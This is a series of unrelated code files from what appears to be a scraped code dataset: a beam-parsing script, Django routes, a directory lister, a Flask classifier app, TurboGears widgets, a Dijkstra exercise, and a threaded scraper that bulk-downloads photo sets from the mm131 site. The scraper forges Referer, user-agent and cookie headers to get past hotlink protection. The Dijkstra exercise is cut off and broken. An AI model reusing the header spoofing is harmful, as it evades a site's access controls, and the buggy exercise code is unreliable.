178.])/255.,\r\nnp.array([90., 161., 85.])/255.,\r\nnp.array([237., 201., 88.])/255.,\r\nnp.array([175., 122., 160.])/255.,\r\nnp.array([254., 158., 168.])/255.,\r\nnp.array([156., 117., 97.])/255.,\r\nnp.array([186., 176., 172.])/255.]\r\n\r\ndef det_name(idx, nus):\r\n\r\n det = 'det{:04d}_{:d}'.format(int(idx), int(np.mean(nus)))\r\n\r\n return det\r\n\r\ndef degsq2srad(deg2):\r\n '''\r\n https://en.wikipedia.org/wiki/Square_degree\r\n '''\r\n\r\n return deg2/(41252.9612494/4/np.pi)\r\n\r\ndef get_da(cr, numel, mult=1):\r\n\r\n return ((float(cr[2])-float(cr[0]))/(mult*float(numel[0])))**2\r\n\r\ndef get_mesh(cr, numel, mult=1):\r\n\r\n xx, yy = np.meshgrid(np.linspace(cr[0], cr[2], mult*numel[0]),\r\n np.linspace(cr[1], cr[3], mult*numel[1]))\r\n\r\n dA = get_da(cr, numel, mult=1)\r\n\r\n return xx, yy, dA\r\n\r\n\r\ndef bsa(arr, dA, maxval=None, normalize=True):\r\n\r\n if maxval is None and normalize:\r\n maxval = np.max(arr.flatten())\r\n\r\n return dA * np.sum(arr/maxval)\r\n\r\n return dA * np.sum(arr)\r\n\r\ndef parse_data(nus=[90], run_str1='test1', run_str2='test1_wide',\r\n rdir='pkl/', idir='img_profiles/'):\r\n\r\n nu = np.mean(nus)\r\n\r\n i = 64\r\n det = det_name(i, nus)\r\n det1 = det + '_{}'.format(run_str1)\r\n det2 = det + '_{}'.format(run_str2)\r\n\r\n fname1 = det1 + '.pkl'\r\n fname2 = det2 + '.pkl'\r\n results1 = pickle.load(open(rdir+fname1, 'rb'), encoding = 'bytes')\r\n prop1 = pickle.load(open(rdir+fname1.replace('.pkl','_prop.pkl'), 'rb'), encoding = 'bytes')\r\n results2 = pickle.load(open(rdir+fname2, 'rb'), encoding = 'bytes')\r\n prop2 = pickle.load(open(rdir+fname2.replace('.pkl','_prop.pkl'), 'rb'), encoding = 'bytes')\r\n\r\n arr11 = (np.abs(results1[b'e_cx'])**2).astype('float32')\r\n arr12 = (np.abs(results2[b'e_cx'])**2).astype('float32')\r\n\r\n print(results1.keys())\r\n print(prop1.keys())\r\n \r\n #print(results1[b'co'])\r\n\r\n bsa1 = degsq2srad(bsa(arr11, get_da(results1[b'cr'], results1[b'numel'])))\r\n bsa2 = degsq2srad(bsa(arr12, get_da(results2[b'cr'], results2[b'numel'])))\r\n \r\n forfitting = {}\r\n forfitting['data'] = arr11\r\n forfitting['mesh'] = get_mesh(results1[b'cr'], results1[b'numel'])\r\n pickle.dump(forfitting, open('fitting_'+fname1, 'wb'))\r\n\r\n foraamir = {}\r\n foraamir['data'] = arr11\r\n len_mesh = abs(forfitting['mesh'][0][0][len(forfitting['mesh'][0][0])-1]-forfitting['mesh'][0][0][0])\r\n pitch_mesh = abs(forfitting['mesh'][0][0][0]-forfitting['mesh'][0][0][1])\r\n foraamir['size'] = [[round(len_mesh, 2), round(pitch_mesh, 3)], [len(forfitting['data'][0]), 1.0]]\r\n print(len(forfitting['data'][0]))\r\n pickle.dump(foraamir, open('aamir_'+fname1, 'wb'))\r\n \r\n \"\"\"\r\n fg1 = 4*np.pi/bsa1\r\n fg2 = 4*np.pi/bsa2\r\n\r\n print(10*np.log10(fg1))\r\n print(10*np.log10(fg2))\r\n print(fname1)\r\n print(fname2)\r\n\r\n pco1 = prop1['pow_co']\r\n pco2 = prop2['pow_co']\r\n pcx1 = prop1['pow_cx']\r\n pcx2 = prop2['pow_cx']\r\n\r\n lstr1 = 'Det #{}'.format(i+1)\r\n lstr2 = 'Det #{} w/window scattering'.format(i+1)\r\n\r\n theta = np.linspace(prop1['theta_min'], prop1['theta_max'], prop1['ntheta'])\r\n plt.plot(theta, 10*np.log10(fg1*pco1[1]/np.max(pco1[1])), label=lstr1, color=cw[0])\r\n plt.plot(theta, 10*np.log10(fg2*pco2[1]/np.max(pco2[1])), label=lstr2, color=cw[1], ls='--')\r\n\r\n plt.legend(ncol=1, frameon=False)\r\n plt.xlabel('Theta [deg]')\r\n plt.ylabel('Power [dBi]')\r\n\r\n plt.ylim([-50, 50])\r\n plt.title('Co-polar beam profiles at {:d} GHz'.format(int(nu)))\r\n plt.savefig(opj(idir, '{}_co'.format(det)), dpi=300, bbox_inches='tight')\r\n\r\n plt.xlim([-20, 20])\r\n plt.savefig(opj(idir, '{}_co_zoom1'.format(det)), dpi=300, bbox_inches='tight')\r\n\r\n plt.xlim([-20, 20])\r\n plt.savefig(opj(idir, '{}_co_zoom1'.format(det)), dpi=300, bbox_inches='tight')\r\n\r\n plt.close()\r\n \"\"\"\r\n\r\ndef main():\r\n\r\n parse_data()\r\n\r\nif __name__ == '__main__':\r\n\r\n main()\r\n","sub_path":"py3_parse_beams.py","file_name":"py3_parse_beams.py","file_ext":"py","file_size_in_byte":4180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"591800027","text":"from django.urls import path,include\nfrom . import views\nfrom django.contrib.auth import views as auth_views\nfrom django.contrib import admin\n\nurlpatterns = [\n # 127.0.0.1:8000 --> local\n # mydjangosite.com --> online\n path('', views.postsList, name='postsList'),\n # 127.0.0.1:8000/post/2 --> local\n # mydjangosite.com/post/2 --> online\n path('post//', views.postsDetail, name='postsDetail'),\n # 127.0.0.1:8000/post/new --> local\n # mydjangosite.com/post/new--> online\n path('post/new/', views.postNew, name='postNew'),\n # 127.0.0.1:8000/post/1/edit --> local\n # mydjangosite.com/post/1/edit--> online\n path('post//edit/', views.postEdit, name='postEdit'),\n # 127.0.0.1:8000/post/1/delete --> local\n # mydjangosite.com/post/1/delete--> online\n path('post//delete/', views.postDelete, name='postDelete'),\n # 127.0.0.1:8000/drafts --> local\n # mydjangosite.com/drafts--> online\n path('drafts/', views.postDraftlist, name='postDraftlist'),\n # 127.0.0.1:8000/post/1/publish --> local\n # mydjangosite.com/post/1/publish--> online\n path('post//publish/', views.postPublish, name='postPublish'),\n # 127.0.0.1:8000/accounts/login --> local\n # mydjangosite.com/accounts/login--> online\n path('accounts/', include('django.contrib.auth.urls')),\n # 127.0.0.1:8000/post/1/comment --> local\n # mydjangosite.com/post/1/comment--> online\n path('post//comment/', views.add_comment_to_post, name='add_comment_to_post'),\n # 127.0.0.1:8000/comment/1/remove --> local\n # mydjangosite.com/comment/1/remove--> online\n path('comment//remove/', views.comment_remove, name='comment_remove'),\n # 127.0.0.1:8000/comment/1/approve --> local\n # mydjangosite.com/comment/1/approve--> online\n path('comment//approve/', views.comment_approve, name='comment_approve'),\n # 127.0.0.1:8000/signup --> local\n # mydjangosite.com/signup--> online\n path('signup/',views.signup, name='signup'),\n # 127.0.0.1:8000/logout-->local\n # mydjangosite.com/logout-->online\n path('logout/', auth_views.LogoutView.as_view(), name='logout'),\n # path(r'^accounts/login/$', auth_views.LoginView.as_view(template_name='registration/login.html')),\n #path)\n #url('^change-password/$', auth_views.PasswordChangeView.as_view()),\n #^login/$ [name='login']\n #^password_change/$ [name='password_change']\n]\n\n\n#login( request, template_name=`registration/login.html`, redirect_field_name='next', authentication_form=AuthenticationForm, current_app=None, extra_context=None, redirect_authenticated_user=False\n\n","sub_path":"blog/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":2634,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"362487327","text":"#coding:utf8\n# 实现目录访问\nimport os\ndef f(path):\n w1=os.listdir(path)\n allfile=[]\n for filename in w1:\n filepath=os.path.join(path,filename)\n if os.path.isdir(filepath):\n f(filepath)\n allfile.append(filepath)\n return allfile\n\ns=open('./1.txt','r+')\npath='./'\nif __name__ == \"__main__\":\n w=f(path)\nfor i in w:\n s.write(i)\ns.close()\n","sub_path":"os.py","file_name":"os.py","file_ext":"py","file_size_in_byte":344,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"483532389","text":"#!/usr/bin/env python3\n# coding=utf-8\n\"\"\"\npip3 install requests\n爬取mm131图片\n\"\"\"\nimport os\nimport re\nimport ssl\nimport time\nimport threading\nimport random\nimport requests\nimport sys\n\nfrom spider_utils import getDataByUrl, getHeaders, getUserAgent\n\nhost_name = \"http://www.mm131.com/\"\n# 要爬取的类别集合\n# key_names = [\"xinggan\", \"qingchun\", \"xiaohua\", \"chemo\", \"qipao\", \"mingxing\"]\n# key_names = [\"chemo\", \"qipao\", \"mingxing\"]\nkey_names = [\"xinggan\"]\n# 图片保存跟路径\nbas_path = \"/Volumes/work/image/mm131/\"\n\nssl._create_default_https_context = ssl._create_unverified_context\n\n\ndef getDataByKey(keynames, page_size):\n \"\"\"\n 批量下载频道下图片\n :param keynames: 频道大类名称\n :param page_size: 下载列表页页数,从1开始\n :return:\n \"\"\"\n for keyname in keynames:\n for index in range(0, page_size): # 每个大的类别获取指定页的套图,每页现在是20组,总共每个大的类别获取60组\n url = host_name + keyname + \"/\"\n if index != 0:\n if keyname == \"xinggan\":\n url += \"list_6_\" + str(index + 1) + \".html\"\n elif keyname == \"qingchun\":\n url += \"list_1_\" + str(index + 1) + \".html\"\n elif keyname == \"xiaohua\":\n url += \"list_2_\" + str(index + 1) + \".html\"\n elif keyname == \"chemo\":\n url += \"list_3_\" + str(index + 1) + \".html\"\n elif keyname == \"qipao\":\n url += \"list_4_\" + str(index + 1) + \".html\"\n elif keyname == \"mingxing\":\n url += \"list_5_\" + str(index + 1) + \".html\"\n\n # print(\"url-->\" + url)\n data = getDataByUrl(url)\n pat_link = '
    \"(.*?)\"\\s{0,}width=\"'\n\" + link)\n data = getDataByUrl(link, encoding='gb2312')\n pat_img = ''\n img_url = re.compile(pat_img, re.S).findall(data)\n saveImgToLocal(img_url[0], keyName, title, pageIndex)\n # print(imgUrl)\n\n\n# 获取每个组的套图链接地址\ndef getDataByGroup(link, pageCounts, keyName, title):\n for pageCount in pageCounts:\n # pageCount代表每个套图中有多少张高清图片\n # print(\"每套套图的高清图片数量:\" + pageCount)\n threads = []\n for i in range(int(pageCount)):\n if i != 0:\n # 如果不是首页的话,就开始替换字符串~\n new_link = link.replace(\".html\", \"_\" + str(i + 1) + \".html\")\n # getImgUrlByLink(new_link, keyName, title, i)\n t = threading.Thread(target=getImgUrlByLink, args=(new_link, keyName, title, i))\n else:\n # getImgUrlByLink(link, keyName, title, i)\n t = threading.Thread(target=getImgUrlByLink, args=(link, keyName, title, i))\n threads.append(t)\n pass\n thread_count = 10\n while threads:\n threads_part = threads[:thread_count]\n for t in threads_part:\n t.start()\n for t in threads_part:\n t.join()\n threads = threads[thread_count:]\n # 随机暂停1到3秒\n time.sleep(round(random.uniform(1, 3), 2))\n\n\nlock = threading.Lock()\n\n\ndef saveImgToLocal(imgUrl, keyName, title, pageIndex):\n \"\"\"\n 下载图片到本地,改用了requests库\n :param imgUrl:图片真实url\n :param keyName: 大的类别关键字,xinggan,qingchun,xiaohua\n :param title: 每个套图的标题\n :param pageIndex: 每个套图中高保真图所在的索引号\n :return:\n \"\"\"\n path = bas_path + keyName + \"/\" + title + \"/\"\n if not os.path.exists(path):\n lock.acquire()\n if not os.path.exists(path):\n os.makedirs(path)\n lock.release()\n path += title + str(pageIndex + 1) + '.jpg'\n if not os.path.exists(path):\n try:\n headers = {'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',\n 'Accept-Encoding': 'gzip, deflate',\n 'Accept-Language': 'zh-CN,zh;q=0.8',\n 'Cache-Control': 'no-cache',\n 'Connection': 'keep-alive',\n 'Cookie': 'UM_distinctid=15fa02251e679e-05c01fdf7965e7-5848211c-144000-15fa02251e7801; bdshare_firstime=1510220189357; CNZZDATA1263415983=1653134122-1510216223-null%7C1510216223; CNZZDATA3866066=cnzz_eid%3D376479854-1494676185-%26ntime%3D1494676185; Hm_lvt_9a737a8572f89206db6e9c301695b55a=1510220189; Hm_lpvt_9a737a8572f89206db6e9c301695b55a=1510220990',\n 'Host': 'img1.mm131.me',\n 'Pragma': 'no-cache',\n 'Referer': 'http://www.mm131.com/' + keyName + \"/\",\n 'User-Agent': getUserAgent()}\n # headers.update({'Cookie': 'UM_distinctid=15fa02251e679e-05c01fdf7965e7-5848211c-144000-15fa02251e7801; bdshare_firstime=1510220189357; CNZZDATA1263415983=1653134122-1510216223-null%7C1510216223; CNZZDATA3866066=cnzz_eid%3D376479854-1494676185-%26ntime%3D1494676185; Hm_lvt_9a737a8572f89206db6e9c301695b55a=1510220189; Hm_lpvt_9a737a8572f89206db6e9c301695b55a=1510220990'})\n pic = requests.get(imgUrl, headers=headers, timeout=10)\n # urllib.request.urlretrieve(imgUrl, path)\n fp = open(path, 'wb')\n fp.write(pic.content)\n fp.close()\n pic.close()\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载完成-->' + imgUrl)\n except requests.exceptions.ConnectionError:\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载【错误】------------')\n except requests.exceptions.ReadTimeout:\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载【超时】------------')\n except Exception as e:\n print(keyName + '下的' + title + '中的第' + str(pageIndex + 1) + '张图片下载【失败】------------')\n print(e)\n else:\n print('%s 已存在' % path)\n # time.sleep(0.15)\n\n\ndef getSingleImg(url):\n \"\"\"\n 下载单独套图\n :param url: 套图地址\n :return:\n \"\"\"\n key = str(url).split('/')[3]\n print(key)\n getDataByLink([url], key)\n\n\nif __name__ == '__main__':\n args = sys.argv[1:]\n if args:\n numb = args[0]\n getSingleImg('http://www.mm131.com/xinggan/'+numb+'.html')\n else:\n numb = input(\"输入编号:\")\n if numb:\n numbs = numb.split(' ')\n for n in numbs:\n getSingleImg('http://www.mm131.com/xinggan/'+n+'.html')\n else:\n getDataByKey(key_names, 4)\n # getSingleImg('http://www.mm131.com/xinggan/4168.html')\n pass\n","sub_path":"spider/mm131.py","file_name":"mm131.py","file_ext":"py","file_size_in_byte":8023,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"52370555","text":"import numpy as np\nimport config\nimport os\nimport torch\nimport cv2\nfrom PIL import Image\nfrom models.base_conv_net_model import BaseConvNet\nfrom util.inference_util import load_model, predict\nfrom flask import Flask\nfrom flask import request\nfrom flask import jsonify\n\napp = Flask(__name__)\n\nModel = None\nIDX_TO_CLASS = None\nCLASS_TO_IDX = None\nDevice = config.INFERENCE_DEVICE\n\n@app.route(\"/\")\ndef welcome():\n return \"hello\"\n\n@app.route(\"/predict\", methods=[\"POST\"])\ndef do_prediction():\n image_path = request.files['image']\n\n image = Image.open(image_path.stream)\n opencvImage = cv2.cvtColor(np.array(image), cv2.COLOR_RGB2BGR)\n if opencvImage is None : \n response_data = {\n \"message\" : \"Provide valid image path\"\n }\n status_code = 400\n else:\n prediction = predict(MODEL, image, IDX_TO_CLASS, height=config.IMAGE_SIZE[0], width=config.IMAGE_SIZE[1])\n response_data = {\n \"message\" : prediction\n }\n status_code = 200\n return jsonify(response_data), status_code\n\nif __name__ == \"__main__\":\n\n current_model_weight_path = os.path.join(config.MODEL_PATH, config.MODEL_NAME)\n check_point_path = os.path.join(current_model_weight_path, config.CHECKPOINT_NAME)\n check_point = torch.load(check_point_path, map_location = torch.device(config.INFERENCE_DEVICE))\n model = BaseConvNet(num_classes=config.NUM_OF_CLASSES)\n MODEL = load_model(model, check_point[\"state_dict\"])\n CLASS_TO_IDX = check_point[\"class_to_idx\"]\n IDX_TO_CLASS = check_point['idx_to_class']\n\n app.run(host='0.0.0.0', port=5000)","sub_path":"app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1602,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"574252739","text":"# -*- coding: utf-8 -*-\nfrom __future__ import unicode_literals\n\nfrom django.db import models, migrations\n\n\nclass Migration(migrations.Migration):\n\n dependencies = [\n ('notebook', '0004_auto_20150925_2309'),\n ]\n\n operations = [\n migrations.AlterField(\n model_name='phone',\n name='contact',\n field=models.ForeignKey(related_name='phones', to='notebook.Contact'),\n ),\n ]\n","sub_path":"notebook/migrations/0005_auto_20150927_0215.py","file_name":"0005_auto_20150927_0215.py","file_ext":"py","file_size_in_byte":435,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"642193214","text":"\"\"\"The bigger TurboGears widgets\"\"\"\n\n__all__ = ['CalendarDatePicker', 'CalendarDateTimePicker',\n 'AutoCompleteField', 'AutoCompleteTextField',\n 'LinkRemoteFunction', 'RemoteForm', 'AjaxGrid', 'URLLink']\n\nimport itertools\nfrom datetime import datetime\n\nfrom turbogears import validators, expose\nfrom turbojson import jsonify\nfrom turbogears.widgets.base import (CSSLink, JSLink, CSSSource, JSSource,\n Widget, WidgetsList, static, mochikit, CoreWD)\nfrom turbogears.widgets.i18n import CalendarLangFileLink\nfrom turbogears.widgets.forms import (FormField, CompoundFormField, TextField,\n HiddenField, TableForm, CheckBox, RadioButtonList)\nfrom turbogears.widgets.rpc import RPC\n\n\nclass CalendarDatePicker(FormField):\n \"\"\"Use a Javascript calendar system to allow picking of calendar dates.\"\"\"\n\n template = \"\"\"\n \n \n \n \n \n \"\"\"\n params = ['attrs', 'skin', 'picker_shows_time', 'button_text',\n 'format', 'calendar_lang']\n params_doc = {\n 'attrs': 'Extra attributes',\n 'skin': 'For alternate skins, such as \"calendar-blue\" or \"skins/aqua/theme\"',\n 'picker_shows_time': 'Whether the calendar should let you pick a time, too',\n 'button_text': 'Text for the button that will show the calendar picker',\n 'format': 'The date format (default is mm/dd/yyyy)',\n 'calendar_lang': 'The language to be used in the calendar picker.'\n }\n attrs = {}\n skin = 'calendar-system'\n picker_shows_time = False\n button_text = 'Choose'\n format = '%m/%d/%Y'\n calendar_lang = None\n _default = None\n\n def __init__(self, name=None, default=None, not_empty=True,\n calendar_lang=None, validator=None, format=None, **kw):\n super(CalendarDatePicker, self).__init__(name, **kw)\n self.not_empty = not_empty\n if default is not None or not self.not_empty:\n self._default = default\n if format is not None:\n self.format = format\n if validator is None:\n self.validator = validators.DateTimeConverter(\n format=self.format, not_empty=self.not_empty)\n else:\n self.validator = validator\n if calendar_lang:\n self.calendar_lang = calendar_lang\n javascript = [JSLink(static, 'calendar/calendar.js'),\n JSLink(static, 'calendar/calendar-setup.js')]\n javascript.append(CalendarLangFileLink(static,\n language=self.calendar_lang))\n self.javascript = self.javascript + javascript\n if self.skin:\n css = [CSSLink(static, 'calendar/%s.css' % self.skin)]\n self.css = self.css + css\n\n @property\n def default(self):\n if self._default is None and self.not_empty:\n return datetime.now()\n return self._default\n\n def update_params(self, d):\n super(CalendarDatePicker, self).update_params(d)\n if hasattr(d['value'], 'strftime'):\n d['strdate'] = d['value'].strftime(d['format'])\n else:\n d['strdate'] = d['value']\n\n\nclass CalendarDatePickerDesc(CoreWD):\n\n name = \"Calendar\"\n for_widget = CalendarDatePicker('date_picker')\n\n\nclass CalendarDateTimePicker(CalendarDatePicker):\n \"\"\"Javascript calendar system to allow picking of dates with times.\"\"\"\n\n format = '%Y/%m/%d %H:%M'\n picker_shows_time = True\n\n\nclass CalendarDateTimePickerDesc(CoreWD):\n\n name = \"Calendar with time\"\n for_widget = CalendarDateTimePicker(\"datetime_picker\")\n\n\nclass AutoComplete(Widget):\n \"\"\"Mixin class for autocomplete fields.\n\n Performs Ajax-style autocompletion by requesting search\n results from the server as the user types.\n\n \"\"\"\n\n javascript = [mochikit, JSLink(static,\"autocompletefield.js\")]\n css = [CSSLink(static,\"autocompletefield.css\")]\n params = ['search_controller', 'search_param', 'result_name', 'attrs',\n 'only_suggest', 'complete_delay', 'take_focus', 'min_chars', 'show_spinner']\n params_doc = {\n 'attrs': 'Extra attributes',\n 'search_controller': 'Name of the controller returning the auto completions',\n 'search_param': 'Name of the search parameter (\"*\" passes all form fields)',\n 'result_name': 'Name of the result list returned by the controller',\n 'only_suggest': 'If true, pressing enter does not automatically submit the first list item.',\n 'complete_delay': 'Delay (in seconds) before loading new auto completions',\n 'take_focus': 'If true, take focus on load.',\n 'min_chars': 'Minimum number of characters to type before autocomplete activates',\n 'show_spinner': 'If false, the spinner (load indicator) is not shown.'\n }\n attrs = {}\n search_controller = ''\n search_param = 'searchString'\n result_name = 'textItems'\n only_suggest = False\n complete_delay = 0.200\n take_focus = False\n min_chars = 1\n show_spinner = True\n\n\nclass AutoCompleteField(CompoundFormField, AutoComplete):\n \"\"\"Text field with auto complete functionality and hidden key field.\"\"\"\n\n template = \"\"\"\n \n \n ${text_field.display(value_for(text_field), **params_for(text_field))}\n \"\"/\n \n ${hidden_field.display(value_for(hidden_field), **params_for(hidden_field))}\n \n \"\"\"\n member_widgets = ['text_field', 'hidden_field']\n text_field = TextField(name='text')\n hidden_field = HiddenField(name='hidden')\n\n\nclass AutoCompleteFieldDesc(CoreWD):\n\n name = \"AutoCompleteField\"\n codes = \"\"\"AK AL AR AS AZ CA CO CT DC DE FL FM GA GU HI IA ID IL IN KS\n KY LA MA MD ME MH MI MN MO MP MS MT NC ND NE NH NJ NM NV NY OH\n OK OR PA PR PW RI SC SD TN TX UM UT VA VI VT WA WI WV WY\"\"\".split()\n states = \"\"\"Alaska Alabama Arkansas American_Samoa Arizona\n California Colorado Connecticut District_of_Columbia\n Delaware Florida Federated_States_of_Micronesia Georgia Guam\n Hawaii Iowa Idaho Illinois Indiana Kansas Kentucky Louisiana\n Massachusetts Maryland Maine Marshall_Islands Michigan\n Minnesota Missouri Northern_Mariana_Islands Mississippi\n Montana North_Carolina North_Dakota Nebraska New_Hampshire\n New_Jersey New_Mexico Nevada New_York Ohio Oklahoma Oregon\n Pennsylvania Puerto_Rico Palau Rhode_Island South_Carolina\n South_Dakota Tennessee Texas U.S._Minor_Outlying_Islands\n Utah Virginia Virgin_Islands_of_the_U.S. Vermont Washington\n Wisconsin West_Virginia Wyoming\"\"\".split()\n states = map(lambda s: s.replace('_', ' '), states)\n state_code = dict(zip(codes, states))\n template = \"\"\"\n
    \n \n
    State\n
    \n \"\"\"\n full_class_name = \"turbogears.widgets.AutoCompleteField\"\n\n def __init__(self, *args, **kw):\n super(AutoCompleteFieldDesc, self).__init__(*args, **kw)\n self.for_widget = AutoCompleteField(name='state_and_code',\n search_controller='%s/search' % self.full_class_name,\n search_param='state', result_name='states')\n\n @expose('json')\n def search(self, state):\n states = []\n code = state.upper()\n if code in self.state_code:\n states.append((self.state_code[code], code))\n else:\n states.extend([s for s in zip(self.states, self.codes)\n if s[0].lower().startswith(state.lower())])\n return dict(states=states)\n\n\nclass AutoCompleteTextField(TextField, AutoComplete):\n \"\"\"Text field with auto complete functionality.\"\"\"\n\n template = \"\"\"\n \n \n \n \"\"/\n \n \n \"\"\"\n\n\nclass AutoCompleteTextFieldDesc(CoreWD):\n\n name = \"AutoCompleteTextField\"\n states = AutoCompleteFieldDesc.states\n state_code = AutoCompleteFieldDesc.state_code\n template = \"\"\"\n \n \n
    State
    \n \"\"\"\n full_class_name = \"turbogears.widgets.AutoCompleteTextField\"\n\n def __init__(self, *args, **kw):\n super(AutoCompleteTextFieldDesc, self).__init__(*args, **kw)\n self.for_widget = AutoCompleteTextField(name=\"state_only\",\n search_controller='%s/search' % self.full_class_name,\n search_param='state', result_name='states')\n\n @expose('json')\n def search(self, state):\n states = []\n code = state.upper()\n if code in self.state_code:\n states.append(self.state_code[code])\n else:\n states.extend([s for s in self.states\n if s.lower().startswith(state.lower())])\n return dict(states=states)\n\n\nclass LinkRemoteFunction(RPC):\n \"\"\"Link with remote execution.\n\n Returns a link that executes a POST asynchronously\n and updates a DOM Object with the result of it.\n\n \"\"\"\n\n template = \"\"\"\n \n \"\"\"\n\n params = ['attrs']\n attrs = {}\n\n\nclass LinkRemoteFunctionDesc(CoreWD):\n\n name = \"AJAX remote function\"\n states = AutoCompleteFieldDesc.states\n template = \"\"\"\n
    \n ${for_widget.display(\"States starting with the letter 'N'\", update=\"items\")}\n
    \n \"\"\"\n full_class_name = 'turbogears.widgets.LinkRemoteFunction'\n\n def __init__(self, *args, **kw):\n super(LinkRemoteFunctionDesc, self).__init__(*args, **kw)\n self.for_widget = LinkRemoteFunction(\n name='linkrf', action='%s/search_linkrf' % self.full_class_name,\n data=dict(state_starts_with='N'))\n\n @expose()\n def search_linkrf(self, state_starts_with):\n return '
    '.join(\n [s for s in self.states if s.startswith(state_starts_with)])\n\n\nclass RemoteForm(RPC, TableForm):\n \"\"\"AJAX table form.\n\n A TableForm that submits the data asynchronously and loads the resulting\n HTML into a DOM object\n\n \"\"\"\n\n def update_params(self, d):\n super(RemoteForm, self).update_params(d)\n d['form_attrs']['onSubmit'] = \"return !remoteFormRequest(this, '%s', %s);\" % (\n d.get('update', ''), jsonify.encode(self.get_options(d)))\n\n\nclass RemoteFormDesc(CoreWD):\n\n name = \"AJAX Form\"\n template = \"\"\"\n
    \n ${for_widget.display()}\n
     
    \n
    \n \"\"\"\n full_class_name = 'turbogears.widgets.RemoteForm'\n\n class TestFormFields(WidgetsList):\n name = TextField()\n age = TextField()\n check = CheckBox()\n radio = RadioButtonList(options=list(enumerate(\n \"Python Java Pascal Ruby\".split())), default=3)\n\n def __init__(self, *args, **kw):\n super(RemoteFormDesc, self).__init__(*args, **kw)\n self.for_widget = RemoteForm(\n fields=self.TestFormFields(),\n name='remote_form',\n update='post_data',\n action='%s/post_data_rf' % self.full_class_name,\n before=\"alert('pre-hook')\",\n confirm=\"Confirm?\",\n )\n\n @expose()\n def post_data_rf(self, **kw):\n return \"\"\"Received data:
    %r\"\"\" % kw\n\n\najaxgridcounter = itertools.count()\n\nclass AjaxGrid(Widget):\n \"\"\"AJAX updateable datagrid based on widget.js grid\"\"\"\n\n template = \"\"\"
    \n \n ${refresh_text}\n \n
    \n \n
    \n \"\"\"\n params = ['refresh_text', 'id', 'defaults']\n defaults = {}\n refresh_text = \"Update\"\n id = 'ajaxgrid_%d' % ajaxgridcounter.next()\n\n def __init__(self, refresh_url, *args, **kw):\n super(AjaxGrid, self).__init__(*args, **kw)\n target = '%s_update' % self.id\n self.javascript = [\n mochikit,\n JSLink('turbogears', 'js/widget.js'),\n JSLink(static, 'ajaxgrid.js'),\n JSSource(\"\"\"\n %(id)s_AjaxGrid = new AjaxGrid('%(refresh_url)s', '%(target)s');\n \"\"\" % dict(id=self.id, refresh_url=refresh_url, target=target)\n ),\n ]\n\n def update_params(self, d):\n super(AjaxGrid, self).update_params(d)\n d['defaults'] = jsonify.encode(d['defaults'])\n\n\nclass AjaxGridDesc(CoreWD):\n\n name = \"AJAX Grid\"\n full_class_name = 'turbogears.widgets.AjaxGrid'\n\n @staticmethod\n def facgen(n):\n total = 1\n yield 0, 1\n for k in xrange(1, n+1):\n total *= k\n yield k, total\n\n\n def __init__(self, *args, **kw):\n super(AjaxGridDesc, self).__init__(*args, **kw)\n self.for_widget = AjaxGrid(\n refresh_url = \"%s/update\" % self.full_class_name,\n # Dummy default params, just POC\n defaults = dict(),\n )\n self.update_count = itertools.count()\n\n @expose('json')\n def update(self):\n return dict(\n headers = ['N', 'fact(N)'],\n rows = list(self.facgen(self.update_count.next())),\n )\n\n\nclass URLLink(FormField):\n \"\"\"Hyperlink\"\"\"\n\n template = \"\"\"\n $text\n \"\"\"\n params = ['target', 'text', 'link', 'attrs']\n attrs = {}\n params_doc = {'link': 'Hyperlink',\n 'target': 'Specify where the link should be opened',\n 'text': 'The message to be shown for the link',\n 'attrs': 'Extra attributes'}\n","sub_path":"horizon-new/virtualenv/lib/python2.6/site-packages/turbogears/widgets/big_widgets.py","file_name":"big_widgets.py","file_ext":"py","file_size_in_byte":16194,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"68"} +{"seq_id":"525043647","text":"#coding=utf-8\r\n#狄克斯特拉算法\r\n#乐谱换钢琴问题\r\ngraph={}\r\ngraph[\"yuepu\"]={}\r\ngraph[\"yuepu\"][\"changpian\"]=5\r\ngraph[\"yuepu\"][\"haibao\"]=0\r\ngraph[\"changpian\"]={}\r\ngraph[\"changpian\"][\"jita\"]=15\r\ngraph[\"changpian\"][\"jiazigu\"]=20\r\ngraph[\"haibao\"]={}\r\ngraph[\"haibao\"][\"jita\"]=30\r\ngraph[\"haibao\"][\"jiazigu\"]=35\r\ngraph[\"jita\"]={}\r\ngraph[\"jita\"][\"gangqin\"]=20\r\ngraph[\"jiazigu\"]={}\r\ngraph[\"jiazigu\"][\"gangqin\"]=10\r\ngraph[\"gangqin\"]={}\r\ninfinity=float(\"inf\")\r\ncosts={}\r\ncosts[\"changpian\"]=5\r\ncosts[\"haibao\"]=0\r\ncosts[\"jita\"]=infinity\r\ncosts[\"jiazigu\"]=infinity\r\ncosts[\"gangqin\"]=infinity\r\nparents={}\r\nparents[\"changpian\"]=\"yuepu\"\r\nparents[\"haibao\"]=\"yuepu\"\r\nparents[\"jita\"]=\"None\"\r\nparents[\"jiazigu\"]=\"None\"\r\nparents[\"gangqin\"]=\"None\"\r\nprocessed=[]\r\n\r\ndef find_low_cost_node(cost):\r\n low_cost = float(\"inf\") \r\n low_node = None\r\n for node in costs :\r\n cost = costs[node]\r\n if(cost new_cost) :costs[n] = new_cost \r\n parents[n] = node \r\n filter1.append(node) \r\n node = find_low_cost_node(cost)\r\n \r\n\r\ndef get_course(sign) :\r\n if(sign != \"yuepu\") :\r\n return get_course(parent[sign]+\" --> \"+sign)\r\n else :\r\n return 